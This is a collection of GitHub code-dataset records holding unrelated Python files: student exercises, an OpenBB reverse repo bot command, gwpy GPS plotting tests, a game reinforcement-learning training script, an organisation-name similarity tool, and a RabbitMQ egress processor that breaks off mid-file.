+{"seq_id":"2049648837","text":"from random import randint\n\n\n\n\n\nclass DataTrans:\n\n def __init__(self):\n DataTrans.D()\n \n d = []\n n=0\n S=0\n\n def f(x):\n return ((x**3) + 3*(x**2) - 5)\n\n\n \n def N():\n global S\n n = []\n for i in range(S):\n n.append(randint(0,100))\n return n\n\n\n def detD():\n global d\n global S\n global n\n for i in range(n):\n DataTrans.d.append(DataTrans.N())\n\n def saisi():\n global n\n global S\n try:\n n = int(input(\"Number of elements in the list: \"))\n S = int(input(\"Please enter the size of each element: \"))\n except ValueError:\n print(\"Please enter integers only\")\n DataTrans.saisi()\n else:\n DataTrans.detD()\n\n def D():\n global d\n global S\n global n\n for i in range(n):\n DataTrans.d.append(DataTrans.N())\n print(DataTrans.d)\n return DataTrans.d\n\n\n def mini(x):\n minn = x[0]\n for i in x:\n if i < minn:\n minn = i\n return minn\n\n\n def maxi(x):\n maxx = x[0]\n for i in x:\n if i > maxx:\n maxx = i\n return maxx\n\n\n def maxEtMin():\n k = []\n l=[]\n global d\n for i in DataTrans.d:\n k.append(DataTrans.mini(i))\n l.append(DataTrans.maxi(i))\n print(f\"Min {k} Max {l} ||| Min Global : {DataTrans.mini(k)}, Max Global : {DataTrans.maxi(l)}\")\n return (f\"Min {k} Max {l} \"), (f\"Min Global : {DataTrans.mini(k)}, Max Global : {DataTrans.maxi(l)}\")\n\n\n def calculFTableau(x):\n resultat = []\n for i in x:\n resultat.append(DataTrans.f(i))\n return resultat\n\n\n def DPrim():\n result = []\n global d\n for i in DataTrans.d:\n result.append(DataTrans.calculFTableau(i))\n print(f\"The D' values for the elements of D are respectively: {result}\")\n return result\n\n\n# DataTrans.D()\n# DataTrans.maxEtMin()\n# DataTrans.DPrim()","repo_name":"hkeyz/odc","sub_path":"Tp Python/Exercice3/exercice2.py","file_name":"exercice2.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15717789007","text":"import logging\n\nimport disnake\nimport pandas as pd\nimport requests\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\n\nlogger = logging.getLogger(__name__)\n\n\n@log_start_end(log=logger)\ndef reverse_repo_command(days: int = 50):\n \"\"\"Displays Reverse Repo [Stocksera.com]\"\"\"\n\n # Debug user input\n if imps.DEBUG:\n 
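# echo the requested lookback window to the bot log\n 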
logger.debug(\"dd repo %s\", days)\n\n df = pd.DataFrame(\n requests.get(\n f\"https://stocksera.pythonanywhere.com/api/reverse_repo/?days={str(days)}\"\n ).json()\n )\n\n if df.empty:\n raise Exception(\"No Data Found\")\n\n title = \"Reverse Repo [Stocksera]\"\n\n df[\"Difference\"] = df[\"Amount\"].diff().fillna(0)\n\n formats = {\n \"Amount\": \"${:.2f}B\",\n \"Average\": \"${:.2f}B\",\n \"Difference\": \"${:.2f}B\",\n }\n for col, value in formats.items():\n df[col] = df[col].map(lambda x: value.format(x)) # pylint: disable=W0640\n\n df = df.drop(columns=\"Moving Avg\")\n df = df.sort_values(by=\"Date\", ascending=False)\n\n font_color = [\"white\"] * 4 + [\n [\n \"#e4003a\" if boolv else \"#00ACFF\"\n for boolv in df[\"Difference\"].str.contains(\"-\")\n ] # type: ignore\n ]\n\n df.set_index(\"Date\", inplace=True)\n df.columns = df.columns.str.capitalize()\n\n dindex = len(df.index)\n if dindex > 15:\n embeds: list = []\n # Output\n i, i2, end = 0, 0, 15\n df_pg, embeds_img, images_list = pd.DataFrame(), [], []\n while i < dindex:\n df_pg = df.iloc[i:end]\n font_color = [\"white\"] * 4 + [\n [\n \"#e4003a\" if boolv else \"#00ACFF\"\n for boolv in df_pg[\"Difference\"].str.contains(\"-\")\n ] # type: ignore\n ]\n df_pg.append(df_pg)\n fig = imps.plot_df(\n df_pg,\n fig_size=(650, (40 + (40 * len(df.index)))),\n col_width=[1.8, 1.5, 1.7, 1.3, 1.8],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n fig.update_traces(\n cells=(\n dict(\n align=[\"center\", \"right\", \"center\", \"right\"],\n font=dict(color=font_color),\n )\n )\n )\n imagefile = \"dd_r_repo.png\"\n imagefile = imps.save_image(imagefile, fig)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n embeds.append(\n disnake.Embed(\n title=title,\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 15\n end += 15\n\n # Author/Footer\n for i in range(0, i2):\n embeds[i].set_author(\n name=imps.AUTHOR_NAME,\n url=imps.AUTHOR_URL,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n embeds[i].set_footer(\n text=imps.AUTHOR_NAME,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n\n i = 0\n for i in range(0, i2):\n embeds[i].set_image(url=embeds_img[i])\n\n i += 1\n embeds[0].set_footer(text=f\"Page 1 of {len(embeds)}\")\n choices = [\n disnake.SelectOption(label=\"Home\", value=\"0\", emoji=\"🟢\"),\n ]\n\n output = {\n \"view\": imps.Menu,\n \"title\": title,\n \"embed\": embeds,\n \"choices\": choices,\n \"embeds_img\": embeds_img,\n \"images_list\": images_list,\n }\n else:\n fig = imps.plot_df(\n df,\n fig_size=(650, (40 + (40 * len(df.index)))),\n col_width=[1.8, 1.5, 1.7, 1.3, 1.8],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n fig.update_traces(\n cells=(\n dict(\n align=[\"center\", \"right\", \"center\", \"right\"],\n font=dict(color=font_color),\n )\n )\n )\n imagefile = \"dd_r_repo.png\"\n imagefile = imps.save_image(imagefile, fig)\n\n output = {\n \"title\": title,\n \"imagefile\": imagefile,\n }\n return 
output\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/economy/reverse_repo.py","file_name":"reverse_repo.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29214592243","text":"# http://www.codewars.com/kata/repeated-substring/train/python\n\ndef f(s):\n first = True\n completed = False\n prev = \"\"\n current = \"\"\n minimum = len(s)\n for i in range(1, len(s)/2 + 1):\n first = True\n completed = True\n for j in range(0, len(s), i):\n p = s[j:j+i]\n if first:\n prev = p\n else:\n if p != prev:\n completed = False\n break\n \n first = False\n if completed:\n if len(prev) < minimum:\n minimum = len(prev)\n \n if len(s) / minimum <= 1:\n return (s, 1)\n else:\n return (s[0: minimum], len(s) / minimum)","repo_name":"PeterPython/problems","sub_path":"codewars/repeated_substring/repeated_substring.py","file_name":"repeated_substring.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14914286007","text":"import pygame\r\nimport torch\r\nimport json\r\nimport os\r\nimport numpy as np\r\n\r\nfrom tqdm import tqdm\r\nimport argparse\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom game import Game\r\nfrom rl_training import QLearningAI\r\nfrom rewards_values import Rewards\r\n\r\n\r\nSCREEN_WIDTH = 1000\r\nSCREEN_HEIGHT = 900\r\n\r\n\r\nclass TrainingSession:\r\n def __init__(self, silent=False, n_games=500, episode_max_length=5, replay_buffer_size=500):\r\n self.silent = silent\r\n self.n_games = n_games\r\n self.episode_max_length = episode_max_length\r\n self.replay_buffer_size = replay_buffer_size\r\n self.rewards = []\r\n\r\n def start_training(self):\r\n print(f'Start the training with the following parameters:')\r\n print(f' Silent mode: {self.silent}')\r\n print(f' Number of games: {self.n_games}')\r\n print(f' Maximum episode length: {self.episode_max_length}')\r\n print(f' Replay buffer size: {self.replay_buffer_size}')\r\n print('\\n\\n')\r\n\r\n if not self.silent:\r\n pygame.init()\r\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n screen.fill((255, 255, 255))\r\n clock = pygame.time.Clock()\r\n clock.tick(60)\r\n else:\r\n screen = None\r\n\r\n n_games = self.n_games\r\n episode_max_length = self.episode_max_length\r\n\r\n with open('init_states/training_configs/1vs1_v2.json', 'r', encoding='utf-8') as f:\r\n config = json.load(f)\r\n\r\n start_game_index = 1#450\r\n\r\n models = None\r\n replay_buffer = None\r\n\r\n best_reward = float('-inf')\r\n \r\n for i in tqdm(range(start_game_index, n_games)):\r\n game = Game(config, screen, None, sound_on=False, autoplay=True, autoplay_max_turns=episode_max_length,\r\n replay_buffer_size=self.replay_buffer_size, silent=self.silent)\r\n models, replay_buffer = game.players[0].ai.init(i, *(models, replay_buffer))\r\n queued_rewards = []\r\n\r\n rl_player = game.players[0]\r\n\r\n game.start()\r\n\r\n game.turn_number = 1\r\n game.subturn_number = 0\r\n while True:\r\n # continue\r\n current_player = game.get_current_player()\r\n\r\n if not self.silent:\r\n print(f'\\n\\n== [Game {i}] {current_player.nation} started the turn {game.turn_number} '\r\n f'with {len(current_player.units)} units and {len(current_player.cities)} cities: ==')\r\n\r\n game.logger.start_turn(current_player.nation)\r\n\r\n # The most important lines:\r\n if current_player == rl_player:\r\n 
current_player.create_paths(queued_rewards=queued_rewards) \r\n queued_rewards = []\r\n else:\r\n current_player.create_paths()\r\n\r\n if game.turn_number > episode_max_length:\r\n self.handle_game_end(rl_player, is_victory=False)\r\n break\r\n\r\n if game.check_winning_conditions(current_player, no_units_eq_lose=True):\r\n self.handle_game_end(rl_player, isinstance(current_player.ai, QLearningAI))\r\n break\r\n\r\n for obj in current_player.game_objects:\r\n res = obj.move(game, calc_rewards_for=[rl_player])[rl_player]\r\n queued_rewards.extend(res)\r\n\r\n obj.gain_hps()\r\n\r\n obj.mp = obj.mp_base\r\n obj.can_attack = True\r\n obj.is_selected = False\r\n\r\n if game.check_winning_conditions(current_player, no_units_eq_lose=True):\r\n self.handle_game_end(rl_player, isinstance(current_player.ai, QLearningAI))\r\n break\r\n\r\n # ----------------------------------\r\n # next player\r\n game.set_next_current_player()\r\n game.update()\r\n\r\n game.logger.commit()\r\n\r\n game.current_turn_text.update(turn_number=game.turn_number)\r\n game.current_player_text.update(current_player=current_player.nation)\r\n game.update()\r\n\r\n game.subturn_number += 1\r\n if game.subturn_number % len(game.players) == 0:\r\n game.turn_number += 1\r\n\r\n game_reward = rl_player.ai.replay_buffer.get_last_game_total_reward()\r\n print(f'At the end of the game {i}, the rewards: {game_reward}')\r\n self.rewards.append(game_reward)\r\n\r\n if game_reward > best_reward:\r\n best_reward = game_reward\r\n torch.save(models[0].state_dict(), f'weights/best_online_model_game_{str(i).zfill(5)}_score_{game_reward}.pt')\r\n torch.save(models[1].state_dict(), f'weights/best_reference_model_game_{str(i).zfill(5)}_score_{game_reward}.pt')\r\n\r\n if i % 100 == 0:\r\n torch.save(models[0].state_dict(), f'weights/online_model_game_{str(i).zfill(5)}.pt')\r\n torch.save(models[1].state_dict(), f'weights/reference_model_game_{str(i).zfill(5)}.pt')\r\n\r\n self.plot_rewards(f'rewards_history/game_{str(i).zfill(5)}.png')\r\n\r\n rl_player.ai.update_models()\r\n\r\n self.plot_rewards('rewards_history/final_result.png')\r\n\r\n def handle_game_end(self, rl_player, is_victory):\r\n reward_value = Rewards.get_named_reward(Rewards.VICTORY) if is_victory else Rewards.get_named_reward(Rewards.DEFEAT)\r\n print('QLearningAI won!' 
if is_victory else 'QLearningAI lost')\r\n\r\n if is_victory:\r\n print()\r\n \r\n for transition in rl_player.ai.replay_buffer.get_unfinished_transitions():\r\n rl_player.ai.replay_buffer.update_new_state_and_reward(turn_number=transition.turn_number,\r\n unit=transition.unit,\r\n new_state=None,\r\n additional_reward=reward_value,\r\n new_state_legal_action=None,)\r\n\r\n if not self.silent:\r\n print(f'Replay buffer final state:')\r\n print(rl_player.ai.replay_buffer)\r\n\r\n @staticmethod\r\n def running_average(data, window_size):\r\n window = np.ones(window_size) / window_size\r\n return np.convolve(data, window, mode='valid')\r\n\r\n def plot_rewards(self, path):\r\n plt.figure(figsize=(10, 5))\r\n plt.plot(self.rewards, label='rewards')\r\n plt.plot(self.running_average(self.rewards, 50))\r\n \r\n plt.legend()\r\n plt.savefig(path)\r\n\r\n @staticmethod\r\n def cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"Start a training session.\")\r\n parser.add_argument('--n_games', type=int, default=500, help=\"Number of games to play.\")\r\n parser.add_argument('--replay_buffer_size', type=int, default=500, help=\"Size of the replay buffer.\")\r\n parser.add_argument('--episode_max_length', type=int, default=5, help=\"Maximum length of an episode.\")\r\n parser.add_argument('--silent', action='store_true', help=\"Run in silent mode without displaying the game.\")\r\n args = parser.parse_args()\r\n\r\n TrainingSession.cls()\r\n print(args.silent)\r\n ts = TrainingSession(silent=args.silent, n_games=args.n_games,\r\n episode_max_length=args.episode_max_length, replay_buffer_size=args.replay_buffer_size)\r\n ts.start_training()\r\n","repo_name":"tikhonovpavel/civ_vi_ai","sub_path":"start_training.py","file_name":"start_training.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13041787853","text":"from decimal import Decimal\n\nimport pytest\n\nimport numpy\n\nfrom matplotlib import pyplot\n\nfrom astropy.units import Unit\n\nfrom .. 
import gps as plot_gps\nfrom ...time import LIGOTimeGPS\n\n\nclass TestGPSMixin(object):\n TYPE = plot_gps.GPSMixin\n\n def test_init(self):\n m = self.TYPE()\n assert m.unit is None\n assert m.epoch is None\n m = self.TYPE(unit='second', epoch=100)\n assert m.unit is Unit('second')\n assert m.epoch == 100.\n\n @pytest.mark.parametrize('in_, out', [\n (None, None),\n (1, 1.),\n ('1', 1.),\n (Decimal(12345), 12345.),\n (numpy.float32(56789), 56789.),\n (LIGOTimeGPS(1234567890, 123000000), 1234567890.123),\n ])\n def test_epoch(self, in_, out):\n mix = self.TYPE(epoch=in_)\n assert mix.epoch == out\n\n @pytest.mark.parametrize('in_, out', [\n (None, None),\n (Unit('second'), Unit('second')),\n (3600, Unit('hour')),\n ('week', Unit('week')),\n ('weeks', Unit('week')),\n ])\n def test_unit(self, in_, out):\n mix = self.TYPE(unit=in_)\n assert mix.unit == out\n\n @pytest.mark.parametrize('badunit', [\n 'blah', # not a unit\n 'meter', # not a time unit\n 'yoctoday', # not a supported time unit\n ])\n def test_unit_error(self, badunit):\n with pytest.raises(ValueError):\n self.TYPE(unit=badunit)\n\n @pytest.mark.parametrize('unit, name', [\n (None, None),\n ('second', 'seconds'),\n ])\n def test_get_unit_name(self, unit, name):\n mix = self.TYPE(unit=unit)\n assert mix.get_unit_name() == name\n\n @pytest.mark.parametrize('unit, scale', [\n (None, 1),\n ('second', 1),\n ('minute', 60),\n ('hour', 3600),\n ])\n def test_scale(self, unit, scale):\n mix = self.TYPE(unit=unit)\n assert mix.scale == scale\n\n\nclass TestGpsTransform(TestGPSMixin):\n TRANSFORM = plot_gps.GPSTransform\n EPOCH = 100.0\n UNIT = 'minutes'\n SCALE = 60.\n X = 190.0\n A = 90.0\n B = 19/6.\n C = 1.5\n\n def test_init(self):\n t = self.TRANSFORM()\n assert t.transform(1.0) == 1.0\n\n def test_epoch(self):\n transform = self.TRANSFORM(epoch=self.EPOCH)\n assert transform.get_epoch() == self.EPOCH\n assert transform.transform(self.X) == self.A\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n def test_scale(self):\n transform = self.TRANSFORM(unit=self.UNIT)\n assert transform.get_scale() == self.SCALE\n assert transform.transform(self.X) == self.B\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n def test_epoch_and_scale(self):\n transform = self.TRANSFORM(epoch=self.EPOCH, unit=self.UNIT)\n assert transform.transform(self.X) == self.C\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n\nclass TestInverseGpsTransform(TestGpsTransform):\n TRANSFORM = plot_gps.InvertedGPSTransform\n A = 290.0\n B = 11400.0\n C = 11500.0\n\n\n@pytest.mark.parametrize(\n 'scale',\n sorted(filter(lambda x: x != 'auto-gps', plot_gps.GPS_SCALES)),\n)\ndef test_gps_scale(scale):\n u = Unit(scale[:-1])\n\n fig = pyplot.figure()\n ax = fig.add_subplot(xscale=scale)\n if scale == 'years':\n x = numpy.arange(50)\n else:\n x = numpy.arange(1e2)\n ax.plot(x * u.decompose().scale, x)\n fig.canvas.draw()\n xscale = ax.get_xaxis()._scale\n assert xscale.get_unit() == Unit(scale[:-1])\n pyplot.close(fig)\n\n\n@pytest.mark.parametrize('scale, unit', [\n (1e-5, 'ms'),\n (1e-4, 'ms'),\n (1e-3, 's'),\n (1e-2, 's'),\n (1e-1, 's'),\n (1e0, 's'),\n (1e1, 'min'),\n (1e2, 'min'),\n (1e3, 'h'),\n (1e4, 'd'),\n (1e5, 'wk'),\n (1e6, 'wk'),\n (1e7, 'yr'),\n])\ndef test_auto_gps_scale(scale, unit):\n fig = pyplot.figure()\n ax = fig.add_subplot(xscale='auto-gps')\n ax.plot(numpy.arange(1e2) * scale, numpy.arange(1e2))\n xscale = 
ax.get_xaxis()._scale\n transform = xscale.get_transform()\n assert transform.unit.name == unit\n pyplot.close(fig)\n\n\ndef test_gps_formatting():\n fig = pyplot.figure()\n try:\n ax = fig.gca()\n ax.set_xscale('seconds', epoch=1238040211.67)\n ax.set_xlim(1238040211.17, 1238040212.17)\n fig.canvas.draw()\n ticks = [\"-0.5\", \"-0.4\", \"-0.3\", \"-0.2\", \"-0.1\",\n \"0\", \"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\"]\n assert [x.get_text() for x in ax.get_xticklabels()] == ticks\n finally:\n pyplot.close(fig)\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/plot/tests/test_gps.py","file_name":"test_gps.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"}
+{"seq_id":"72843634321","text":"# import libraries\nimport argparse\nimport json\nimport os\n\nimport spacy\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers.util import cos_sim\n\n\nclass NamSim:\n '''\n Class for checking similarity of organisations' names\n '''\n def __init__(self):\n self.model_spacy = spacy.load(\"en_core_web_sm\")\n try:\n self.model_st = SentenceTransformer('./models/1.0_db-multilingual-cased-v2')\n except Exception:\n print('Check the model folder. Perhaps it is empty.')\n\n def check_similarity(self, name_1: str, name_2: str):\n '''\n Method of NamSim for checking two strings for similarity\n '''\n first = self.model_st.encode([name_1], convert_to_numpy=True)\n second = self.model_st.encode([name_2], convert_to_numpy=True)\n cosine_scores = cos_sim(first, second)\n return float(cosine_scores[0][0]) > 0.88\n\n def parse_deep(self, text: str):\n '''\n Method of NamSim for parsing text with\n Spacy and checking similarity of all organisations' names\n with SentenceTransformer\n '''\n add_val = False\n token_dic = {}\n last_tokens = []\n sentences = text.split('.')\n for sen in sentences:\n doc = self.model_spacy(sen)\n for token in doc.ents:\n if token.label_ == 'ORG' and len(token) > 1:\n print(token)\n if len(last_tokens) > 0:\n for t in last_tokens:\n if self.check_similarity(token, t):\n token_dic[t].append((token.start_char, token.end_char))\n add_val = True\n break\n if not add_val:\n last_tokens.append(token.text)\n token_dic[token.text] = []\n token_dic[token.text].append([token.start_char, token.end_char])\n add_val = False\n return token_dic\n\n def parse_text(self, path: str):\n '''\n Method of NamSim to start parsing text\n '''\n file_name = path.split('/')[-1].split('.')[0]\n if os.path.exists(path) and path.endswith('.txt'):\n with open(path, 'r') as file:\n text = file.read()\n file.close()\n text = text.strip()\n data = self.parse_deep(text)\n with open(os.path.join('./out', file_name + '.json'), 'w') as new_file:\n json.dump(data, new_file, indent=4)\n new_file.close()\n else:\n print(\"Path to file doesn't exist\")\n\n\nif __name__ == '__main__':\n namsim = NamSim()\n parser = argparse.ArgumentParser()\n parser.add_argument('--check', type=str, nargs=2, required=False)\n parser.add_argument('--path', type=str, nargs=1, required=False)\n args = parser.parse_args()\n if args.check:\n res = namsim.check_similarity(args.check[0], args.check[1])\n print(res)\n elif args.path:\n namsim.parse_text(args.path[0])\n else:\n namsim.parse_text('./texts/1.txt')\n","repo_name":"dpkaranov/org_name_similarity","sub_path":"name_sim.py","file_name":"name_sim.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31859473033","text":"# Python will encode the text based on the default text encoding. \n# Additionally, Python will convert line endings (\\n) to whatever the platform-specific line ending is, \n# which would corrupt a binary file like an exe or png file.\n# 'wb' mode is specifically designed for writing binary data, such as images, audio files, video files,\n# and other non-textual data. When you open a file in binary write mode ('wb'), the data is written \n# as-is without any character encoding or interpretation.\n\nbinary_data = b'\\x48\\x65\\x6c\\x6c\\x6f\\x20\\x57\\x6f\\x72\\x6c\\x64' # Binary representation of \"Hello World\"\n\nwith open('binary_file.bin', 'wb') as file:\n file.write(binary_data)\n\nwith open('binary_file.bin', 'rb') as file:\n content = file.read()\n print(f\"File Content: {content}\")\n\nprint(\"Task3: writing binary file is done\")","repo_name":"Jaivik-Jariwala/InfoSec_Ciphers","sub_path":"Setup/college/Adv_py/week_4/day_1/write_binary.py","file_name":"write_binary.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23156513183","text":"import sys\n\nfrom PySide6.QtWidgets import QApplication, QLabel, QMainWindow\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setCentralWidget(QLabel(\"Hello, world!\"))\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n","repo_name":"nyavramov/python_app_mac_app_store","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"31573730472","text":"from tkinter import *\r\nroot = Tk()\r\nc = Canvas(root, width=540, height=960, bg='white')\r\nc.pack()\r\ndata = []\r\nwith open('DS7.txt') as f:\r\n for line in f:\r\n data.append([int(x) for x in line.split()])\r\n\r\nfor i in range(len(data)):\r\n image = c.create_oval(data[i][0],data[i][1], data[i][0], data[i][1], fill='black')\r\n\r\nroot.mainloop()\r\nimage.save('res.jpg')\r\n","repo_name":"sTorba24/test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4161175091","text":"# Copyright (c) 2001-2020 Seagate Technology LLC and/or its Affiliates\r\n#\r\n# This program is free software: you can redistribute it and/or modify it under the\r\n# terms of the GNU Affero General Public License as published by the Free Software\r\n# Foundation, either version 3 of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\r\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\r\n# PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License along\r\n# with this program. If not, see . 
For any questions\r\n# about this software or licensing, please email opensource@seagate.com or\r\n# cortx-questions@seagate.com.\r\n\r\n\"\"\"\r\n ****************************************************************************\r\n Description: Handles outgoing messages via rabbitMQ over localhost\r\n ****************************************************************************\r\n\"\"\"\r\n\r\nimport json\r\nimport pika\r\nimport os\r\nimport time\r\nfrom sspl_test.framework.base.module_thread import ScheduledModuleThread\r\nfrom sspl_test.framework.base.internal_msgQ import InternalMsgQ\r\nfrom sspl_test.framework.utils.service_logging import logger\r\nfrom .rabbitmq_sspl_test_connector import RabbitMQSafeConnection\r\n\r\nimport ctypes\r\ntry:\r\n use_security_lib=True\r\n SSPL_SEC = ctypes.cdll.LoadLibrary('libsspl_sec.so.0')\r\nexcept Exception as ae:\r\n logger.info(\"RabbitMQegressProcessor, libsspl_sec not found, disabling authentication on egress msgs\")\r\n use_security_lib=False\r\n\r\n\r\nclass RabbitMQegressProcessor(ScheduledModuleThread, InternalMsgQ):\r\n \"\"\"Handles outgoing messages via rabbitMQ over localhost\"\"\"\r\n\r\n MODULE_NAME = \"RabbitMQegressProcessor\"\r\n PRIORITY = 1\r\n\r\n # Section and keys in configuration file\r\n SYSTEM_INFORMATION = \"SYSTEM_INFORMATION\"\r\n RACK_ID = \"rack_id\"\r\n NODE_ID = \"node_id\"\r\n CLUSTER_ID = \"cluster_id\"\r\n SITE_ID = \"site_id\"\r\n\r\n RABBITMQPROCESSOR = MODULE_NAME.upper()\r\n VIRT_HOST = 'virtual_host'\r\n\r\n PRIMARY_RABBITMQ_HOST = 'primary_rabbitmq_host'\r\n EXCHANGE_NAME = 'exchange_name'\r\n QUEUE_NAME = 'queue_name'\r\n ROUTING_KEY = 'routing_key'\r\n\r\n ACK_QUEUE_NAME = 'ack_queue_name'\r\n ACK_ROUTING_KEY = 'ack_routing_key'\r\n\r\n USER_NAME = 'username'\r\n PASSWORD = 'password'\r\n SIGNATURE_USERNAME = 'message_signature_username'\r\n SIGNATURE_TOKEN = 'message_signature_token'\r\n SIGNATURE_EXPIRES = 'message_signature_expires'\r\n IEM_ROUTE_ADDR = 'iem_route_addr'\r\n IEM_ROUTE_EXCHANGE_NAME = 'iem_route_exchange_name'\r\n\r\n @staticmethod\r\n def name():\r\n \"\"\" @return: name of the module.\"\"\"\r\n return RabbitMQegressProcessor.MODULE_NAME\r\n\r\n def __init__(self):\r\n super(RabbitMQegressProcessor, self).__init__(self.MODULE_NAME,\r\n self.PRIORITY)\r\n\r\n def initialize(self, conf_reader, msgQlist, product):\r\n \"\"\"initialize configuration reader and internal msg queues\"\"\"\r\n # Initialize ScheduledMonitorThread\r\n super(RabbitMQegressProcessor, self).initialize(conf_reader)\r\n\r\n # Initialize internal message queues for this module\r\n super(RabbitMQegressProcessor, self).initialize_msgQ(msgQlist)\r\n\r\n # Flag denoting that a shutdown message has been placed\r\n # into our message queue from the main sspl_ll_d handler\r\n self._request_shutdown = False\r\n\r\n self._msg_sent_succesfull = True\r\n\r\n self._product = product\r\n\r\n # Configure RabbitMQ Exchange to transmit messages\r\n self._connection = None\r\n self._read_config()\r\n self._connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._exchange_name, self._routing_key, self._queue_name\r\n )\r\n self._ack_connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._exchange_name, self._ack_routing_key, self._ack_queue_name\r\n )\r\n self._iem_connection = RabbitMQSafeConnection(\r\n self._username, self._password, self._virtual_host,\r\n self._iem_route_exchange_name, self._routing_key,\r\n self._queue_name\r\n )\r\n # Display 
values used to configure pika from the config file\r\n self._log_debug(\"RabbitMQ user: %s\" % self._username)\r\n self._log_debug(\"RabbitMQ exchange: %s, routing_key: %s, vhost: %s\" %\r\n (self._exchange_name, self._routing_key, self._virtual_host))\r\n\r\n def run(self):\r\n \"\"\"Run the module periodically on its own thread. \"\"\"\r\n self._log_debug(\"Start accepting requests\")\r\n\r\n #self._set_debug(True)\r\n #self._set_debug_persist(True)\r\n\r\n try:\r\n # Loop thru all messages in queue until and transmit\r\n while not self._is_my_msgQ_empty():\r\n # Only get a new msg if we've successfully processed the current one\r\n if self._msg_sent_succesfull:\r\n self._jsonMsg = self._read_my_msgQ()\r\n\r\n if self._jsonMsg is not None:\r\n self._transmit_msg_on_exchange()\r\n\r\n except Exception:\r\n # Log it and restart the whole process when a failure occurs\r\n logger.exception(\"RabbitMQegressProcessor restarting\")\r\n\r\n # Configure RabbitMQ Exchange to receive messages\r\n self._get_connection()\r\n self._get_ack_connection()\r\n\r\n self._log_debug(\"Finished processing successfully\")\r\n\r\n # Shutdown is requested by the sspl_ll_d shutdown handler\r\n # placing a 'shutdown' msg into our queue which allows us to\r\n # finish processing any other queued up messages.\r\n if self._request_shutdown == True:\r\n self.shutdown()\r\n else:\r\n self._scheduler.enter(1, self._priority, self.run, ())\r\n\r\n def _read_config(self):\r\n \"\"\"Configure the RabbitMQ exchange with defaults available\"\"\"\r\n try:\r\n self._virtual_host = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.VIRT_HOST,\r\n 'SSPL')\r\n\r\n # Read common RabbitMQ configuration\r\n self._primary_rabbitmq_host = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.PRIMARY_RABBITMQ_HOST,\r\n 'localhost')\r\n\r\n # Read RabbitMQ configuration for sensor messages\r\n self._queue_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.QUEUE_NAME,\r\n 'sensor-queue')\r\n self._exchange_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.EXCHANGE_NAME,\r\n 'sspl-out')\r\n self._routing_key = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ROUTING_KEY,\r\n 'sensor-key')\r\n # Read RabbitMQ configuration for Ack messages\r\n self._ack_queue_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ACK_QUEUE_NAME,\r\n 'sensor-queue')\r\n 